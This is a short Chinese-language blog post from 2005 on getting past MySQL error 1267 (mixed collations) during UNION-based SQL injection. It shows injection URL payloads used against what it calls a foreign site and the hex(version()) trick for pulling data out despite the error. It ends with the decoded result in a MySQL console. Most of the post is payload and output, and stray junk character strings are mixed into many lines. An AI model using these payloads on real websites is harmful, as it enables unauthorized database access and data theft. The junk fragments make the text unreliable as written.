MySQL注射时ErrorNo.1267的突破

admin

本文作者：SuperHei
( p' N* z! W% L; n! z6 d文章性质：原创
发布日期：2005-10-18
测试个国外的站时：
9 z( F# q1 Q; Iurl：?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
返回错误：
# \+ @1 |) p( W: }; }Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
MySQL Error No. 126
看来是union查询前后字符集（http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html）不同出现的。
# t, X. v4 A& W6 \: n! \2 ~( A解决办法：转为其他编码如hex。
- _7 @, e# c7 W4 T( s0 aurl：?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
* r9 @7 @( R; o成功得到hex(version())的值为：
9 {. @$ Q4 z- \/ c. |, ]342E312E332D62657461
回Mysql查询下得到：
9 z9 M& [: T9 x# u/ smysql> select 0x342E312E332D62657461;
+------------------------+
| 0x342E312E332D62657461 |
+------------------------+
| 4.1.3-beta |
7 p  h" I* `4 A0 P) T1 d+------------------------+
4 c% }+ J. N7 _+ l9 }0 q1 row in set (0.00 sec)